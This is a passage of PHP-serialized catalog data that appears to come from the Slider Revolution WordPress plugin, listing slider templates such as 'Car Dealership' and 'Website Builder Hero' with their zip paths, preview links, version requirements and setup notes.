Products\";s:5:\"alias\";s:25:\"fullsite-block-4-products\";s:3:\"zip\";s:35:\"packs/fullsite-block-4-products.zip\";s:3:\"uid\";s:32:\"d148935362d7122636cda0635eae4be7\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:80;a:25:{s:2:\"id\";s:2:\"82\";s:5:\"title\";s:34:\"Light Content Block - Testimonials\";s:5:\"alias\";s:29:\"fullsite-block-5-testimonials\";s:3:\"zip\";s:39:\"packs/fullsite-block-5-testimonials.zip\";s:3:\"uid\";s:32:\"06255bfd421e40f71fa8197b839dbf03\";s:3:\"img\";s:40:\"fullsite-block-5-testimonials/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:81;a:25:{s:2:\"id\";s:2:\"83\";s:5:\"title\";s:29:\"Light Content Block - Callout\";s:5:\"alias\";s:24:\"fullsite-block-6-callout\";s:3:\"zip\";s:34:\"packs/fullsite-block-6-callout.zip\";s:3:\"uid\";s:32:\"8a88c3447676b613ec5db2fe5d63315c\";s:3:\"img\";s:35:\"fullsite-block-6-callout/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:82;a:25:{s:2:\"id\";s:2:\"84\";s:5:\"title\";s:28:\"Light Content Block - Footer\";s:5:\"alias\";s:23:\"fullsite-block-7-footer\";s:3:\"zip\";s:33:\"packs/fullsite-block-7-footer.zip\";s:3:\"uid\";s:32:\"34300b4407a2093eb2e1e08868fa8319\";s:3:\"img\";s:34:\"fullsite-block-7-footer/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:83;a:22:{s:2:\"id\";s:2:\"85\";s:5:\"title\";s:12:\"Tech Journal\";s:5:\"alias\";s:11:\"techjournal\";s:3:\"zip\";s:15:\"techjournal.zip\";s:3:\"uid\";s:32:\"7f92d70d1c108378f915b18c2ceb71d6\";s:3:\"img\";s:22:\"techjournal/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.1\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:130:\"<span class=\"ttm_content\">A full-width slider with navigation direction-based transitions.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:84;a:22:{s:2:\"id\";s:2:\"86\";s:5:\"title\";s:14:\"Car Dealership\";s:5:\"alias\";s:13:\"cardealership\";s:3:\"zip\";s:17:\"cardealership.zip\";s:3:\"uid\";s:32:\"bb010838855a8ae4d1dd68e139bf169e\";s:3:\"img\";s:24:\"cardealership/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/car-dealership-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"650\";s:11:\"description\";s:130:\"<span class=\"ttm_content\">A full-width slider with navigation direction-based transitions.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:85;a:22:{s:2:\"id\";s:2:\"87\";s:5:\"title\";s:22:\"FullScreen Menu Slider\";s:5:\"alias\";s:14:\"fullscreenmenu\";s:3:\"zip\";s:18:\"fullscreenmenu.zip\";s:3:\"uid\";s:32:\"6de81d74c4bf193e2e274d43038adc85\";s:3:\"img\";s:25:\"fullscreenmenu/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-fullscreen-menu/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:131:\"<span class=\"ttm_content\">A full-screen slider that contains a menu with slide blur effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:86;a:22:{s:2:\"id\";s:2:\"88\";s:5:\"title\";s:18:\"Creative Frontpage\";s:5:\"alias\";s:17:\"creativefrontpage\";s:3:\"zip\";s:21:\"creativefrontpage.zip\";s:3:\"uid\";s:32:\"0636cb368af3bcaa2f68eb0ebefe6439\";s:3:\"img\";s:28:\"creativefrontpage/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/best-wordpress-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:246:\"<span class=\"ttm_content\">A full-screen slider with hidden slides that are triggered via  <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a>.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:87;a:25:{s:2:\"id\";s:2:\"89\";s:5:\"title\";s:20:\"Website Builder Menu\";s:5:\"alias\";s:19:\"websitebuilder-menu\";s:3:\"zip\";s:29:\"packs/websitebuilder-menu.zip\";s:3:\"uid\";s:32:\"d9e6d9c961f123a3a4847b51fc3ba3a2\";s:3:\"img\";s:30:\"websitebuilder-menu/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:2:\"60\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:88;a:25:{s:2:\"id\";s:2:\"90\";s:5:\"title\";s:20:\"Website Builder Hero\";s:5:\"alias\";s:19:\"websitebuilder-hero\";s:3:\"zip\";s:29:\"packs/websitebuilder-hero.zip\";s:3:\"uid\";s:32:\"6cb2df9a41ad2e7865bb9bbea7e39cb5\";s:3:\"img\";s:30:\"websitebuilder-hero/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"700\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:89;a:25:{s:2:\"id\";s:2:\"91\";s:5:\"title\";s:23:\"Website Builder Clients\";s:5:\"alias\";s:22:\"websitebuilder-clients\";s:3:\"zip\";s:32:\"packs/websitebuilder-clients.zip\";s:3:\"uid\";s:32:\"050e59c43c9a693510d01f29532088cf\";s:3:\"img\";s:33:\"websitebuilder-clients/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"120\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:90;a:25:{s:2:\"id\";s:2:\"92\";s:5:\"title\";s:24:\"Website Builder Services\";s:5:\"alias\";s:23:\"websitebuilder-services\";s:3:\"zip\";s:33:\"packs/websitebuilder-services.zip\";s:3:\"uid\";s:32:\"48d56d67615efce619ae973ab4358c07\";s:3:\"img\";s:34:\"websitebuilder-services/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"558\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:91;a:25:{s:2:\"id\";s:2:\"93\";s:5:\"title\";s:24:\"Website Builder Discover\";s:5:\"alias\";s:23:\"websitebuilder-discover\";s:3:\"zip\";s:33:\"packs/websitebuilder-discover.zip\";s:3:\"uid\";s:32:\"425a08a7be338daea3df02a07ff5c316\";s:3:\"img\";s:34:\"websitebuilder-discover/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"955\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:92;a:25:{s:2:\"id\";s:2:\"94\";s:5:\"title\";s:22:\"Website Builder Slider\";s:5:\"alias\";s:21:\"websitebuilder-slider\";s:3:\"zip\";s:31:\"packs/websitebuilder-slider.zip\";s:3:\"uid\";s:32:\"9d670b7335016accb590dc8d52bfb6f0\";s:3:\"img\";s:32:\"websitebuilder-slider/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:93;a:25:{s:2:\"id\";s:2:\"95\";s:5:\"title\";s:28:\"Website Builder CallToAction\";s:5:\"alias\";s:27:\"websitebuilder-calltoaction\";s:3:\"zip\";s:37:\"packs/websitebuilder-calltoaction.zip\";s:3:\"uid\";s:32:\"45851baf9e61f55ed9f5fa9d0beff77e\";s:3:\"img\";s:38:\"websitebuilder-calltoaction/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"960\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:94;a:25:{s:2:\"id\";s:2:\"96\";s:5:\"title\";s:22:\"Website Builder Footer\";s:5:\"alias\";s:21:\"websitebuilder-footer\";s:3:\"zip\";s:31:\"packs/websitebuilder-footer.zip\";s:3:\"uid\";s:32:\"2732bbe66ef28219d6cc53ce8cc78863\";s:3:\"img\";s:32:\"websitebuilder-footer/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:95;a:22:{s:2:\"id\";s:2:\"97\";s:5:\"title\";s:21:\"Focus Parallax Effect\";s:5:\"alias\";s:13:\"focusparallax\";s:3:\"zip\";s:17:\"focusparallax.zip\";s:3:\"uid\";s:32:\"13bd15fb3ddf8b9841cb55b89389cc73\";s:3:\"img\";s:24:\"focusparallax/slide1.jpg\";s:7:\"preview\";s:68:\" https://revolution.themepunch.com/parallax-effect-wordpress-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:256:\"<span class=\"ttm_content\">A full-screen slider with mouse controlled parallax effects. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:96;a:22:{s:2:\"id\";s:2:\"98\";s:5:\"title\";s:14:\"Duotone Slider\";s:5:\"alias\";s:7:\"duotone\";s:3:\"zip\";s:11:\"duotone.zip\";s:3:\"uid\";s:32:\"494862ceb6cb7c6658ad7cd36848cccd\";s:3:\"img\";s:18:\"duotone/slide1.jpg\";s:7:\"preview\";s:64:\"https://revolution.themepunch.com/wordpress-header-image-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.4\";s:5:\"width\";s:4:\"1200\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:252:\"<span class=\"ttm_content\">A full-screen slider with unique parallax scroll effect. <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\">\"Layer Actions\"</a> are used for links on layers.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:97;a:25:{s:2:\"id\";s:2:\"99\";s:5:\"title\";s:12:\"Minimal Menu\";s:5:\"alias\";s:6:\"r_menu\";s:3:\"zip\";s:16:\"packs/r_menu.zip\";s:3:\"uid\";s:32:\"30d6a6895db1a5f29b1679061551c9f0\";s:3:\"img\";s:17:\"r_menu/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/minimal-website-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.2.6\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"110\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:890:\"<span class=\"ttm_content\">\r\nIn the <a href=\"https://https://www.themepunch.com/slider-revolution/custom-css-javascript/\" target=\"_blank\">Custom 